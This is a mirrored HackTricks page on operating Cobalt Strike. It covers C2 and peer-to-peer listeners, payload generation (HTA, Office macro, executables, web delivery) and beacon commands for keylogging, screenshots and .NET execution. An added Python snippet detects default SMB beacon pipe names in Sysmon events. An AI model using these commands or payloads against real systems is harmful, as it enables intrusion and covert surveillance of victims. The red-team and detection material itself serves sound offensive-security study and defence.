mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
Cobalt Strike
Listeners
C2 Listeners
Cobalt Strike -> Listeners -> Add/Edit, then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
Peer2Peer Listeners
The beacons of these listeners don't need to talk to the C2 directly; they can communicate with it through other beacons.
Cobalt Strike -> Listeners -> Add/Edit, then you need to select the TCP or SMB beacons.
- The TCP beacon will set a listener on the selected port. To connect to a TCP beacon, use the command connect <ip> <port> from another beacon.
- The SMB beacon will listen on a named pipe with the selected name. To connect to an SMB beacon, use the command link [target] [pipe].
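From the detection side, as an added example that is not part of the original page or of Cobalt Strike itself: because an SMB beacon listens on a named pipe, Sysmon pipe events (ID 17 created, ID 18 connected) can be triaged against publicly documented default pipe-name patterns and a per-host baseline. The patterns, the baseline and the sample events are assumptions constructed for illustration; since the pipe name is operator-selected, the default patterns only catch unchanged configurations, which is why the baseline check is included.

```python
import re

# Publicly documented Cobalt Strike default pipe-name patterns (assumption:
# not taken from this page; operators can rename them in the listener/profile).
DEFAULT_PIPE_PATTERNS = [
    re.compile(r"^\\msagent_[0-9a-f]{1,4}$", re.I),        # default SMB beacon pipe
    re.compile(r"^\\MSSE-[0-9a-f]{1,5}-server$", re.I),    # default stager pipe
    re.compile(r"^\\postex(_ssh)?_[0-9a-f]{4}$", re.I),    # post-exploitation jobs
]

# Constructed baseline of pipe names normally seen on this (hypothetical) host.
BASELINE = {r"\lsass", r"\wkssvc", r"\srvsvc", r"\spoolss"}

# Constructed Sysmon-style records: EventID 17 = pipe created, 18 = pipe connected.
SAMPLE_EVENTS = [
    {"EventID": 17, "Image": r"C:\Windows\System32\lsass.exe", "PipeName": r"\lsass"},
    {"EventID": 17, "Image": r"C:\Users\bob\AppData\Local\Temp\upd.exe", "PipeName": r"\msagent_3f"},
    {"EventID": 18, "Image": "System", "PipeName": r"\msagent_3f"},
    {"EventID": 17, "Image": r"C:\Windows\System32\rundll32.exe", "PipeName": r"\reporting_svc"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe"},
]

def classify(event, baseline=BASELINE):
    """Return a finding label for a pipe event, or None if nothing stands out."""
    if event.get("EventID") not in (17, 18):
        return None
    name = event.get("PipeName", "")
    if any(p.match(name) for p in DEFAULT_PIPE_PATTERNS):
        return "default-pattern"
    if name.lower() not in {b.lower() for b in baseline}:
        return "not-in-baseline"
    return None

def triage(events, baseline=BASELINE):
    """Collect (label, EventID, Image, PipeName) for every flagged event."""
    findings = []
    for ev in events:
        label = classify(ev, baseline)
        if label:
            findings.append((label, ev["EventID"], ev["Image"], ev["PipeName"]))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

A "not-in-baseline" hit is only a lead for review: the baseline has to be built per host role, and legitimate software creates new pipes all the time.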
Generate & Host payloads
Generate payloads in files
Attacks -> Packages ->
- HTMLApplication for HTA files
- MS Office Macro for an office document with a macro
- Windows Executable for a .exe, .dll or service .exe
- Windows Executable (S) for a stageless .exe, .dll or service .exe (better stageless than staged, fewer IoCs)
Generate & Host payloads
Attacks -> Web Drive-by -> Scripted Web Delivery (S)
This will generate a script/executable to download the beacon from Cobalt Strike in formats such as bitsadmin, exe, powershell and python.
Host Payloads
If you already have the file you want to host on a web server, just go to Attacks -> Web Drive-by -> Host File and select the file to host and the web server config.
Beacon Options
# Execute local .NET binary
execute-assembly </path/to/executable.exe>
# Screenshots
printscreen # Take a single screenshot via PrintScr method
screenshot # Take a single screenshot
screenwatch # Take periodic screenshots of desktop
## Go to View -> Screenshots to see them
# Keylogger
keylogger [pid] [x86|x64]
## View > Keystrokes to see the keys pressed
# Import PowerShell module
powershell-import C:\path\to\PowerView.ps1